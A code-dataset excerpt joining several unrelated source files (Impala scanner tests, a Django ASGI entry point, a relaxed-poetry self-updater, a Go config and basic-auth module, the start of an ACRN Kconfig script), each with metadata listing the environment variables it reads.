# reads. In the case of Parquet, this counter would be > 0 if a fragment was assigned
# a scan range that does *not* contain the midpoint of a Parquet row group. Assert
# that this value is always 0.
self.__assert_counter_equals(r'NumScannersWithNoReads: (\d+)', 0,
result.runtime_profile)
def __assert_counter_equals(self, counter_regex, value, runtime_profile):
"""Helper method that asserts that the given counter_regex is in the given
runtime_profile and that each occurence of the counter matches the expected value."""
num_row_groups_counters = re.findall(counter_regex, runtime_profile)
assert len(num_row_groups_counters) > 1
for num_row_groups in num_row_groups_counters: assert int(num_row_groups) == value
# More tests for text scanner
# 1. Test file that ends w/o tuple delimiter
# 2. Test file with escape character
class TestTextScanRangeLengths(ImpalaTestSuite):
ESCAPE_TABLE_LIST = ["testescape_16_lf", "testescape_16_crlf",
"testescape_17_lf", "testescape_17_crlf",
"testescape_32_lf", "testescape_32_crlf"]
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestTextScanRangeLengths, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('max_scan_range_length', *MAX_SCAN_RANGE_LENGTHS))
cls.ImpalaTestMatrix.add_constraint(lambda v:
v.get_value('table_format').file_format == 'text' and
v.get_value('table_format').compression_codec == 'none')
def test_text_scanner(self, vector):
vector.get_value('exec_option')['max_scan_range_length'] =\
vector.get_value('max_scan_range_length')
self.execute_query_expect_success(self.client, "drop stats "
"functional.table_no_newline_part")
self.execute_query_expect_success(self.client, "compute stats "
"functional.table_no_newline_part")
self.run_test_case('QueryTest/hdfs-text-scan', vector)
# Test various escape char cases. We have to check the count(*) result against
# the count(col) result because if the scan range is split right after the escape
# char, the escape char has no effect because we cannot scan backwards to the
# previous scan range.
for t in self.ESCAPE_TABLE_LIST:
expected_result = self.client.execute("select count(col) from " + t)
result = self.client.execute("select count(*) from " + t)
assert result.data == expected_result.data
# Tests behavior of split "\r\n" delimiters.
class TestTextSplitDelimiters(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestTextSplitDelimiters, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(lambda v:
v.get_value('table_format').file_format == 'text' and
v.get_value('table_format').compression_codec == 'none')
def test_text_split_delimiters(self, vector, unique_database):
"""Creates and queries a datafile that exercises interesting edge cases around split
"\r\n" delimiters. The data file contains the following 4-byte scan ranges:
abc\r First scan range, ends with split \r\n
- materializes (abc)
\nde\r Initial delimiter found, scan range ends with split \r\n
- materializes (de)
\nfg\r Initial delimiter found, scan range ends with \r
- materializes (fg),(hij)
hij\r Initial delimiter is \r at end
- materializes (klm)
klm\r Initial delimiter is split \r\n
- materializes nothing
\nno\r Final scan range, initial delimiter found, ends with \r
- materializes (no)
"""
DATA = "abc\r\nde\r\nfg\rhij\rklm\r\nno\r"
max_scan_range_length = 4
expected_result = ['abc', 'de', 'fg', 'hij', 'klm', 'no']
self._create_and_query_test_table(
vector, unique_database, DATA, max_scan_range_length, expected_result)
def test_text_split_across_buffers_delimiter(self, vector, unique_database):
"""Creates and queries a datafile that exercises a split "\r\n" across io buffers (but
within a single scan range). We use a 32MB file and 16MB scan ranges, so there are two
scan ranges of two io buffers each. The first scan range exercises a split delimiter
in the main text parsing algorithm. The second scan range exercises correctly
identifying a split delimiter as the first in a scan range."""
DEFAULT_IO_BUFFER_SIZE = 8 * 1024 * 1024
data = ('a' * (DEFAULT_IO_BUFFER_SIZE - 1) + "\r\n" + # first scan range
'b' * (DEFAULT_IO_BUFFER_SIZE - 3) + "\r\n" +
'a' * (DEFAULT_IO_BUFFER_SIZE - 1) + "\r\n" + # second scan range
'b' * (DEFAULT_IO_BUFFER_SIZE - 1))
assert len(data) == DEFAULT_IO_BUFFER_SIZE * 4
max_scan_range_length = DEFAULT_IO_BUFFER_SIZE * 2
expected_result = data.split("\r\n")
new_vector = deepcopy(vector)
new_vector.get_value('exec_option')['max_row_size'] = 9 * 1024 * 1024
self._create_and_query_test_table(
new_vector, unique_database, data, max_scan_range_length, expected_result)
def _create_and_query_test_table(self, vector, unique_database, data,
max_scan_range_length, expected_result):
TABLE_NAME = "test_text_split_delimiters"
qualified_table_name = "%s.%s" % (unique_database, TABLE_NAME)
location = get_fs_path("/test-warehouse/%s_%s" % (unique_database, TABLE_NAME))
query = "create table %s (s string) location '%s'" % (qualified_table_name, location)
self.client.execute(query)
with tempfile.NamedTemporaryFile() as f:
f.write(data)
f.flush()
self.filesystem_client.copy_from_local(f.name, location)
self.client.execute("refresh %s" % qualified_table_name);
vector.get_value('exec_option')['max_scan_range_length'] = max_scan_range_length
query = "select * from %s" % qualified_table_name
result = self.execute_query_expect_success(
self.client, query, vector.get_value('exec_option'))
assert sorted(result.data) == sorted(expected_result)
# Test for IMPALA-1740: Support for skip.header.line.count
class TestTextScanRangeLengths(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestTextScanRangeLengths, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(lambda v:
v.get_value('table_format').file_format == 'text' and
v.get_value('table_format').compression_codec in ['none', 'gzip'])
def test_text_scanner_with_header(self, vector, unique_database):
# Remove to allow .test file to set abort_on_error.
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['abort_on_error']
self.run_test_case('QueryTest/hdfs-text-scan-with-header', new_vector,
test_file_vars={'$UNIQUE_DB': unique_database})
def test_dateless_timestamp_text(self, vector, unique_database):
"""Test scanning text files which still includes dateless timestamps."""
tbl_name = "timestamp_text_table"
create_sql = "create table %s.%s (t timestamp) stored as textfile" % (
unique_database, tbl_name)
create_table_and_copy_files(self.client, create_sql, unique_database, tbl_name,
["/testdata/data/dateless_timestamps.txt"])
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['abort_on_error']
self.run_test_case('QueryTest/dateless_timestamp_text', new_vector, unique_database)
# Missing Coverage: No coverage for truncated files errors or scans.
@SkipIfS3.hive
@SkipIfGCS.hive
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfIsilon.hive
@SkipIfLocal.hive
class TestScanTruncatedFiles(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestScanTruncatedFiles, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(create_single_exec_option_dimension())
# This test takes about a minute to complete due to the Hive commands that are
# executed. To cut down on runtime, limit the test to exhaustive exploration
# strategy.
# TODO: Test other file formats
if cls.exploration_strategy() == 'exhaustive':
cls.ImpalaTestMatrix.add_constraint(lambda v:
v.get_value('table_format').file_format == 'text' and
v.get_value('table_format').compression_codec == 'none')
else:
cls.ImpalaTestMatrix.add_constraint(lambda v: False)
def test_scan_truncated_file_empty(self, vector, unique_database):
self.scan_truncated_file(0, unique_database)
def test_scan_truncated_file(self, vector, unique_database):
self.scan_truncated_file(10, unique_database)
def scan_truncated_file(self, num_rows, db_name):
fq_tbl_name = db_name + ".truncated_file_test"
self.execute_query("create table %s (s string)" % fq_tbl_name)
self.run_stmt_in_hive("insert overwrite table %s select string_col from "
"functional.alltypes" % fq_tbl_name)
# Update the Impala metadata
self.execute_query("refresh %s" % fq_tbl_name)
# Insert overwrite with a truncated file
self.run_stmt_in_hive("insert overwrite table %s select string_col from "
"functional.alltypes limit %s" % (fq_tbl_name, num_rows))
# The file will not exist if the table is empty and the insert is done by Hive 3, so
# another refresh is needed.
self.execute_query("refresh %s" % fq_tbl_name)
result = self.execute_query("select count(*) from %s" % fq_tbl_name)
assert(len(result.data) == 1)
assert(result.data[0] == str(num_rows))
class TestUncompressedText(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestUncompressedText, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(lambda v:
v.get_value('table_format').file_format == 'text' and
v.get_value('table_format').compression_codec == 'none')
# IMPALA-5315: Test support for date/time in unpadded format
def test_scan_lazy_timestamp(self, vector, unique_database):
test_files = ["testdata/data/lazy_timestamp.csv"]
create_table_and_copy_files(self.client, """CREATE TABLE {db}.{tbl} (ts TIMESTAMP)""",
unique_database, "lazy_ts", test_files)
self.run_test_case('QueryTest/select-lazy-timestamp', vector, unique_database)
class TestOrc(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestOrc, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('table_format').file_format == 'orc')
@SkipIfS3.hdfs_block_size
@SkipIfGCS.hdfs_block_size
@SkipIfABFS.hdfs_block_size
@SkipIfADLS.hdfs_block_size
@SkipIfEC.fix_later
@SkipIfIsilon.hdfs_block_size
@SkipIfLocal.multiple_impalad
def test_misaligned_orc_stripes(self, vector, unique_database):
self._build_lineitem_table_helper(unique_database, 'lineitem_threeblocks',
'lineitem_threeblocks.orc')
self._build_lineitem_table_helper(unique_database, 'lineitem_sixblocks',
'lineitem_sixblocks.orc')
self._build_lineitem_table_helper(unique_database,
'lineitem_orc_multiblock_one_stripe',
'lineitem_orc_multiblock_one_stripe.orc')
# functional_orc.alltypes is well-formatted. 'NumScannersWithNoReads' counters are
# set to 0.
table_name = 'functional_orc_def.alltypes'
self._misaligned_orc_stripes_helper(table_name, 7300)
# lineitem_threeblock.orc is ill-formatted but every scanner reads some stripes.
# 'NumScannersWithNoReads' counters are set to 0.
table_name = unique_database + '.lineitem_threeblocks'
self._misaligned_orc_stripes_helper(table_name, 16000)
# lineitem_sixblocks.orc is ill-formatted but every scanner reads some stripes.
# 'NumScannersWithNoReads' counters are set to 0.
table_name = unique_database + '.lineitem_sixblocks'
self._misaligned_orc_stripes_helper(table_name, 30000)
# Scanning lineitem_orc_multiblock_one_stripe.orc finds two scan ranges that end up
# doing no reads because the file is poorly formatted.
table_name = unique_database + '.lineitem_orc_multiblock_one_stripe'
self._misaligned_orc_stripes_helper(
table_name, 16000, num_scanners_with_no_reads=2)
def _build_lineitem_table_helper(self, db, tbl, file):
self.client.execute("create table %s.%s like tpch.lineitem stored as orc" % (db, tbl))
tbl_loc = get_fs_path("/test-warehouse/%s.db/%s" % (db, tbl))
# set block size to 156672 so lineitem_threeblocks.orc occupies 3 blocks,
# lineitem_sixblocks.orc occupies 6 blocks.
check_call(['hdfs', 'dfs', '-Ddfs.block.size=156672', '-copyFromLocal', '-d', '-f',
os.environ['IMPALA_HOME'] + "/testdata/LineItemMultiBlock/" + file, tbl_loc])
self.client.execute("refresh %s.%s" % (db, tbl))
def _misaligned_orc_stripes_helper(
self, table_name, rows_in_table, num_scanners_with_no_reads=0):
"""Checks if 'num_scanners_with_no_reads' indicates the expected number of scanners
that don't read anything because the underlying file is poorly formatted
"""
query = 'select * from %s' % table_name
result = self.client.execute(query)
assert len(result.data) == rows_in_table
num_scanners_with_no_reads_list = re.findall(
'NumScannersWithNoReads: ([0-9]*)', result.runtime_profile)
# This will fail if the number of impalads != 3
# The fourth fragment is the "Averaged Fragment"
assert len(num_scanners_with_no_reads_list) == 4
# Calculate the total number of scan ranges that ended up not reading anything because
# an underlying file was poorly formatted.
# Skip the Averaged Fragment; it comes first in the runtime profile.
total = 0
for n in num_scanners_with_no_reads_list[1:]:
total += int(n)
assert total == num_scanners_with_no_reads
# Skip this test on non-HDFS filesystems, because orc-type-check.test contains Hive
# queries that hang in some cases (IMPALA-9345). It would be possible to separate
# the tests that use Hive and run most tests on S3, but I think that running these on
# S3 doesn't add too much coverage.
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfIsilon.hive
@SkipIfLocal.hive
@SkipIfS3.hive
@SkipIfGCS.hive
@SkipIfHive3.non_acid
def test_type_conversions_hive2(self, vector, unique_database):
# Create "illtypes" tables whose columns can't match the underlining ORC file's.
# Create an "safetypes" table likes above but ORC columns can still fit into it.
# Reuse the data files of alltypestiny and date_tbl in funtional_orc_def.
tbl_loc = get_fs_path("/test-warehouse/alltypestiny_orc_def")
self.client.execute("""create external table %s.illtypes (c1 boolean, c2 float,
c3 boolean, c4 tinyint, c5 smallint, c6 int, c7 boolean, c8 string, c9 int,
c10 float, c11 bigint) partitioned by (year int, month int) stored as ORC
location '%s';""" % (unique_database, tbl_loc))
self.client.execute("""create external table %s.illtypes_ts_to_date (c1 boolean,
c2 float, c3 boolean, c4 tinyint, c5 smallint, c6 int, c7 boolean, c8 string,
c9 int, c10 float, c11 date) partitioned by (year int, month int) stored as ORC
location '%s';""" % (unique_database, tbl_loc))
self.client.execute("""create external table %s.safetypes (c1 bigint, c2 boolean,
c3 smallint, c4 int, c5 bigint, c6 bigint, c7 double, c8 double, c9 char(3),
c10 varchar(3), c11 timestamp) partitioned by (year int, month int) stored as ORC
location '%s';""" % (unique_database, tbl_loc))
self.client.execute("""create external table %s.illtypes_date_tbl (c1 boolean,
c2 timestamp) partitioned by (date_part date) stored as ORC location '%s';"""
% (unique_database, "/test-warehouse/date_tbl_orc_def"))
self.client.execute("alter table %s.illtypes recover partitions" % unique_database)
self.client.execute("alter table %s.illtypes_ts_to_date recover partitions"
% unique_database)
self.client.execute("alter table %s.safetypes recover partitions" % unique_database)
self.client.execute("alter table %s.illtypes_date_tbl recover partitions"
% unique_database)
# Create a decimal table whose precisions don't match the underlining orc files.
# Reuse the data files of functional_orc_def.decimal_tbl.
decimal_loc = get_fs_path("/test-warehouse/decimal_tbl_orc_def")
self.client.execute("""create external table %s.mismatch_decimals (d1 decimal(8,0),
d2 decimal(8,0), d3 decimal(19,10), d4 decimal(20,20), d5 decimal(2,0))
partitioned by (d6 decimal(9,0)) stored as orc location '%s'"""
% (unique_database, decimal_loc))
self.client.execute("alter table %s.mismatch_decimals recover partitions"
% unique_database)
self.run_test_case('DataErrorsTest/orc-type-checks', vector, unique_database)
# Skip this test on non-HDFS filesystems, because orc-type-check.test contains Hive
# queries that hang in some cases (IMPALA-9345). It would be possible to separate
# the tests that use Hive and run most tests on S3, but I think that running these on
# S3 doesn't add too much coverage.
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfIsilon.hive
@SkipIfLocal.hive
@SkipIfS3.hive
@SkipIfGCS.hive
@SkipIfHive2.acid
def test_type_conversions_hive3(self, vector, unique_database):
# Create "illtypes" tables whose columns can't match the underlining ORC file's.
# Create an "safetypes" table likes above but ORC columns can still fit into it.
# Reuse the data files of alltypestiny and date_tbl in funtional_orc_def.
def create_plain_orc_table(fq_tbl_src, fq_tbl_dest):
self.run_stmt_in_hive(
"create table %s like %s stored as orc" % (fq_tbl_dest, fq_tbl_src))
self.run_stmt_in_hive("insert into %s select * from %s" % (fq_tbl_dest, fq_tbl_src))
self.client.execute("invalidate metadata %s" % fq_tbl_dest)
tmp_alltypes = unique_database + ".alltypes"
create_plain_orc_table("functional.alltypestiny", tmp_alltypes)
tbl_loc = self._get_table_location(tmp_alltypes, vector)
self.client.execute("""create table %s.illtypes (c1 boolean, c2 float,
c3 boolean, c4 tinyint, c5 smallint, c6 int, c7 boolean, c8 string, c9 int,
c10 float, c11 bigint) partitioned by (year int, month int) stored as ORC
location '%s'""" % (unique_database, tbl_loc))
self.client.execute("""create table %s.illtypes_ts_to_date (c1 boolean,
c2 float, c3 boolean, c4 tinyint, c5 smallint, c6 int, c7 boolean, c8 string,
c9 int, c10 float, c11 date) partitioned by (year int, month int) stored as ORC
location '%s'""" % (unique_database, tbl_loc))
self.client.execute("""create table %s.safetypes (c1 bigint, c2 boolean,
c3 smallint, c4 int, c5 bigint, c6 bigint, c7 double, c8 double, c9 char(3),
c10 varchar(3), c11 timestamp) partitioned by (year int, month int) stored as ORC
location '%s'""" % (unique_database, tbl_loc))
tmp_date_tbl = unique_database + ".date_tbl"
create_plain_orc_table("functional.date_tbl", tmp_date_tbl)
date_tbl_loc = self._get_table_location(tmp_date_tbl, vector)
self.client.execute("""create table %s.illtypes_date_tbl (c1 boolean,
c2 timestamp) partitioned by (date_part date) stored as ORC location '%s'"""
% (unique_database, date_tbl_loc))
self.client.execute("alter table %s.illtypes recover partitions" % unique_database)
self.client.execute("alter table %s.illtypes_ts_to_date recover partitions"
% unique_database)
self.client.execute("alter table %s.safetypes recover partitions" % unique_database)
self.client.execute("alter table %s.illtypes_date_tbl recover partitions"
% unique_database)
# Create a decimal table whose precisions don't match the underlining orc files.
# Reuse the data files of functional_orc_def.decimal_tbl.
tmp_decimal_tbl = unique_database + ".decimal_tbl"
create_plain_orc_table("functional.decimal_tbl", tmp_decimal_tbl)
decimal_loc = self._get_table_location(tmp_decimal_tbl, vector)
self.client.execute("""create table %s.mismatch_decimals (d1 decimal(8,0),
d2 decimal(8,0), d3 decimal(19,10), d4 decimal(20,20), d5 decimal(2,0))
partitioned by (d6 decimal(9,0)) stored as orc location '%s'"""
% (unique_database, decimal_loc))
self.client.execute("alter table %s.mismatch_decimals recover partitions"
% unique_database)
self.run_test_case('DataErrorsTest/orc-type-checks', vector, unique_database)
def test_orc_timestamp_out_of_range(self, vector, unique_database):
"""Test the validation of out-of-range timestamps."""
test_files = ["testdata/data/out_of_range_timestamp.orc"]
create_table_and_copy_files(self.client, "create table {db}.{tbl} "
"(ts timestamp) stored as orc",
unique_database, "out_of_range_timestamp", test_files)
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['abort_on_error']
self.run_test_case('DataErrorsTest/orc-out-of-range-timestamp',
new_vector, unique_database)
def _run_invalid_schema_test(self, unique_database, test_name, expected_error):
"""Copies 'test_name'.orc to a table and runs a simple query. These tests should
cause an error during the processing of the ORC schema, so the file's columns do
not have to match with the table's columns.
"""
test_files = ["testdata/data/%s.orc" % test_name]
create_table_and_copy_files(self.client,
"CREATE TABLE {db}.{tbl} (id BIGINT) STORED AS ORC",
unique_database, test_name, test_files)
err = self.execute_query_expect_failure(self.client,
"select count(*) from {0}.{1}".format(unique_database, test_name))
assert expected_error in str(err)
def test_invalid_schema(self, vector, unique_database):
"""Test scanning of ORC file with malformed schema."""
self._run_invalid_schema_test(unique_database, "corrupt_schema",
"Encountered parse error during schema selection")
self._run_invalid_schema_test(unique_database, "corrupt_root_type",
"Root of the selected type returned by the ORC lib is not STRUCT: boolean.")
def test_date_out_of_range_orc(self, vector, unique_database):
"""Test scanning orc files with an out of range date."""
orc_tbl_name = "out_of_range_date_orc"
create_sql = "create table %s.%s (d date) stored as orc" % (unique_database,
orc_tbl_name)
create_table_and_copy_files(self.client, create_sql, unique_database, orc_tbl_name,
["/testdata/data/out_of_range_date.orc"])
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['abort_on_error']
self.run_test_case('QueryTest/out-of-range-date-orc', new_vector, unique_database)
def test_pre_gregorian_date_orc(self, vector, unique_database):
"""Test date interoperability issues between Impala and Hive 2.1.1 when scanning
an orc table that contains dates that precede the introduction of Gregorian
calendar in 1582-10-15.
"""
orc_tbl_name = "hive2_pre_gregorian_orc"
create_sql = "create table %s.%s (d date) stored as orc" % (unique_database,
orc_tbl_name)
create_table_and_copy_files(self.client, create_sql, unique_database, orc_tbl_name,
["/testdata/data/hive2_pre_gregorian.orc"])
self.run_test_case('QueryTest/hive2-pre-gregorian-date-orc', vector, unique_database)
class TestScannerReservation(ImpalaTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestScannerReservation, cls).add_test_dimensions()
# Only run with a single dimension - all queries are format-specific and
# reference tpch or tpch_parquet directly.
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
def test_scanners(self, vector):
self.run_test_case('QueryTest/scanner-reservation', vector)
class TestErasureCoding(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@SkipIf.not_ec
def test_erasure_coding(self, vector):
self.run_test_case('QueryTest/hdfs-erasure-coding', vector)
|
[] |
[] |
[
"IMPALA_HOME"
] |
[]
|
["IMPALA_HOME"]
|
python
| 1 | 0 | |
Chapter-2/test_django_project/test_django_project/asgi.py
|
"""
ASGI config for test_django_project project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test_django_project.settings')
application = get_asgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
poetry/app/relaxed_poetry_updater.py
|
import os
import shutil
import site
from pathlib import Path
from typing import TYPE_CHECKING, Optional
from poetry.core.pyproject.project import Project
from poetry.core.utils.props_ext import cached_property
from poetry.console import console
from poetry.console.exceptions import PoetrySimpleConsoleException
from poetry.factory import Factory
from poetry.repositories.installed_repository import InstalledRepository
if TYPE_CHECKING:
from poetry.app.relaxed_poetry import RelaxedPoetry
class RelaxedPoetryUpdater:
def __init__(self, rp: "RelaxedPoetry"):
self._rp = rp
@cached_property
def _installation_env(self):
from poetry.utils.env import EnvManager
return EnvManager.get_system_env(naive=False)
# @cached_property
# def _pool(self) -> Pool:
# pool = Pool()
# pool.add_repository(PyPiRepository())
# return pool
@cached_property
def bin_dir(self) -> Path:
from poetry.utils._compat import WINDOWS
if os.getenv("RP_HOME"):
return Path(os.getenv("RP_HOME"), "bin").expanduser()
user_base = site.getuserbase()
if WINDOWS:
bin_dir = os.path.join(user_base, "Scripts")
else:
bin_dir = os.path.join(user_base, "bin")
return Path(bin_dir)
@cached_property
def _installed_repository(self) -> InstalledRepository:
return InstalledRepository.load(self._installation_env)
def is_installed_using_recommended_installer(self) -> bool:
from poetry.utils.env import EnvManager
env = EnvManager.get_system_env(naive=True)
# We can't use is_relative_to() since it's only available in Python 3.9+
try:
env.path.relative_to(self._rp.installation_dir())
return True
except ValueError:
return False
# def _find_update_version(self, version: Optional[str]) -> Optional[Package]:
# if not version:
# version = ">=" + self._rp.version
#
# console.println(f"Attempting to find update version with constraint: {version}")
# repo = self._pool.repositories[0]
# packages = repo.find_packages(
# Dependency("relaxed-poetry", version)
# )
#
# if not packages:
# raise PoetrySimpleConsoleException(f"No release found for version '{version}'")
#
# packages.sort(
# key=cmp_to_key(
# lambda x, y: 0
# if x.version == y.version
# else int(x.version < y.version or -1)
# )
# )
#
# return packages[0] if len(packages) > 0 else None
def update(self, version: Optional[str], dry_run: bool) -> bool:
if not self.is_installed_using_recommended_installer():
raise PoetrySimpleConsoleException(
"Poetry was not installed with the recommended installer, "
"so it cannot be updated automatically."
)
env = self._installation_env
from poetry.__version__ import __version__
pyproject = Project.new_in_mem("rp-installation", "1.0.0")
dependencies = pyproject.dependencies
dependencies["relaxed-poetry"] = version or f">={__version__}"
dependencies["python"] = "^3.6"
pt = Factory().create_poetry_for_pyproject(pyproject, env=env)
pt.installer.update(True)
pt.installer.dry_run(dry_run)
pt.installer.run()
# release = self._find_update_version(version)
#
# if release is None:
# console.println("No new release found")
# return False
#
# console.println(f"Updating <c1>Relaxed-Poetry</c1> to <c2>{release.version}</c2>")
# console.println()
#
# self.add_packages(f"relaxed-poetry {release}", dry_run=dry_run)
self._make_bin()
#
# console.println(f"<c1>Relaxed-Poetry</c1> (<c2>{release.version}</c2>) is installed now. Great!")
# console.println()
return True
def _make_bin(self) -> None:
from poetry.utils._compat import WINDOWS
console.println("")
console.println("Updating the <c1>rp</c1> script")
self.bin_dir.mkdir(parents=True, exist_ok=True)
script = "rp"
target_script = "venv/bin/rp"
if WINDOWS:
script = "rp.exe"
target_script = "venv/Scripts/rp.exe"
if self.bin_dir.joinpath(script).exists():
self.bin_dir.joinpath(script).unlink()
try:
self.bin_dir.joinpath(script).symlink_to(
self._rp.installation_dir().joinpath(target_script)
)
except OSError:
# This can happen if the user
# does not have the correct permission on Windows
shutil.copy(
self._rp.installation_dir().joinpath(target_script), self.bin_dir.joinpath(script)
)
# def add_packages(self, *packages: str, dry_run: bool):
# from poetry.config.config import Config
# from poetry.core.packages.dependency import Dependency
# from poetry.core.packages.project_package import ProjectPackage
# from poetry.installation.installer import Installer
# from poetry.packages.locker import NullLocker
# from poetry.repositories.installed_repository import InstalledRepository
#
# env = self._installation_env
#
# installed = InstalledRepository.load(env)
#
# root = ProjectPackage("rp-add-packages", "0.0.0")
# root.python_versions = ".".join(str(c) for c in env.version_info[:3])
# for package in packages:
# root.add_dependency(Dependency.create_from_pep_508(package))
#
# installer = Installer(
# console.io,
# env,
# root,
# NullLocker(self._rp.installation_dir().joinpath("poetry.lock"), {}),
# self._pool,
# Config(),
# installed=installed,
# )
#
# installer.update(True)
# installer.dry_run(dry_run)
# installer.run()
# def has_package(self, package: str, constraint: str = "*") -> bool:
# ir: InstalledRepository = self._installed_repository
# return len(ir.find_packages(Dependency(package, constraint))) > 0
|
[] |
[] |
[
"RP_HOME"
] |
[]
|
["RP_HOME"]
|
python
| 1 | 0 | |
datadir/config.go
|
package datadir
import (
"github.com/pkg/errors"
log "github.com/sirupsen/logrus"
logsyslog "github.com/sirupsen/logrus/hooks/syslog"
yaml "gopkg.in/yaml.v2"
"io/ioutil"
"log/syslog"
"net"
"os"
"path/filepath"
"time"
)
func NewConfig() *Config {
return new(Config)
}
func (self *Config) ParseDatadir() error {
cfgPath := Datapath("server.yml")
if _, err := os.Stat(cfgPath); os.IsNotExist(err) {
err = self.validateValues()
if err != nil {
return err
}
return nil
}
data, err := ioutil.ReadFile(cfgPath)
if err != nil {
return err
}
err = yaml.Unmarshal(data, self)
if err != nil {
return err
}
return self.validateValues()
}
func (self Config) ValidateSchema() bool {
if self.pValidateSchema == nil {
return true
} else {
return *self.pValidateSchema
}
}
func (self Config) Authorize(username string, password string, remoteAddress string) string {
if len(self.Authorizations) == 0 {
return "default"
} else {
for _, bauth := range self.Authorizations {
if bauth.Authorize(username, password, remoteAddress) {
namespace := bauth.Namespace
if namespace == "" {
namespace = "default"
}
return namespace
}
}
}
return ""
}
func (self *Config) validateValues() error {
if self.Version == "" {
self.Version = "1.0"
}
if self.Server.Bind == "" {
self.Server.Bind = "127.0.0.1:50055"
}
if self.pValidateSchema == nil {
v := true
self.pValidateSchema = &v
}
// tls
if self.Server.TLS.CertFile != "" {
certFile := filepath.Join(Datapath("tls/"), self.Server.TLS.CertFile)
if _, err := os.Stat(certFile); os.IsNotExist(err) {
return errors.New("config, tls certification file does not exist")
}
self.Server.TLS.CertFile = certFile
}
if self.Server.TLS.KeyFile != "" {
keyFile := filepath.Join(Datapath("tls/"), self.Server.TLS.KeyFile)
if _, err := os.Stat(keyFile); os.IsNotExist(err) {
return errors.New("config, tls key file does not exist")
}
self.Server.TLS.KeyFile = keyFile
}
// logs
if self.Logging.Output != "" {
self.Logging.Output = Datapath(self.Logging.Output)
}
// authorizations
for _, bauth := range self.Authorizations {
err := bauth.validateValues()
if err != nil {
return nil
}
}
// logging
// if self.Logging.Output == "" {
// self.Logging.Output = ""
// }
// syslog
if self.Logging.Syslog.URL == "" {
self.Logging.Syslog.URL = "localhost:514"
}
if self.Logging.Syslog.Protocol == "" {
self.Logging.Syslog.Protocol = "udp"
}
if self.Logging.Syslog.Protocol != "udp" &&
self.Logging.Syslog.Protocol != "tcp" {
return errors.New("config, invalid syslog protocol")
}
return nil
}
func (self *Config) SetupLogger() {
log.SetFormatter(&log.JSONFormatter{
TimestampFormat: time.RFC3339Nano,
})
logOutput := self.Logging.Output
if logOutput == "" || logOutput == "console" || logOutput == "stdout" {
log.SetOutput(os.Stdout)
} else if logOutput == "stderr" {
log.SetOutput(os.Stderr)
} else {
file, err := os.OpenFile(logOutput, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0666)
if err != nil {
panic(err)
}
log.SetOutput(file)
}
if self.Logging.Syslog.Enabled {
hook, err := logsyslog.NewSyslogHook(
self.Logging.Syslog.Protocol,
self.Logging.Syslog.URL,
syslog.LOG_INFO, "")
if err != nil {
panic(err)
}
log.AddHook(hook)
}
envLogLevel := os.Getenv("LOG_LEVEL")
switch envLogLevel {
case "DEBUG":
log.SetLevel(log.DebugLevel)
case "INFO":
log.SetLevel(log.InfoLevel)
case "WARN":
log.SetLevel(log.WarnLevel)
case "ERROR":
log.SetLevel(log.ErrorLevel)
default:
log.SetLevel(log.InfoLevel)
}
}
func (self BasicAuth) Authorize(username string, password string, ipAddr string) bool {
return self.checkUser(username, password) && self.checkIP(ipAddr)
}
func (self BasicAuth) checkUser(username string, password string) bool {
return self.Username == username && self.Password == password
}
func (self BasicAuth) checkIP(ipAddr string) bool {
if len(self.AllowedSources) > 0 {
ip := net.ParseIP(ipAddr)
if ip == nil {
log.Errorf("parse ip failed %s", ipAddr)
}
if self.allowedIPNets != nil {
for _, ipnet := range self.allowedIPNets {
if ipnet.Contains(ip) {
return true
}
}
}
return false
} else {
return true
}
}
func (self *BasicAuth) validateValues() error {
if self.AllowedSources != nil {
allowedIPNets := make([]*net.IPNet, 0)
for _, cidrStr := range self.AllowedSources {
_, ipnet, err := net.ParseCIDR(cidrStr)
if err != nil {
return err
}
allowedIPNets = append(allowedIPNets, ipnet)
}
self.allowedIPNets = allowedIPNets
}
if self.Namespace == "" {
self.Namespace = "default"
}
return nil
}
|
[
"\"LOG_LEVEL\""
] |
[] |
[
"LOG_LEVEL"
] |
[]
|
["LOG_LEVEL"]
|
go
| 1 | 0 | |
misc/acrn-config/kconfig/silentoldconfig.py
|
# Copyright (C) 2018 Intel Corporation.
# SPDX-License-Identifier: BSD-3-Clause
# This script
#
# 1. takes a Kconfig and a .config and an optional list of symbol-value pairs,
# 2. checks whether the specified symbols have the specified values in the
# given .config, and
# 3. reconstruct .config with the given list of symbol-value pairs if there
# is any disagreement.
import sys
import os
# Kconfiglib: Copyright (c) 2011-2018, Ulf Magnusson
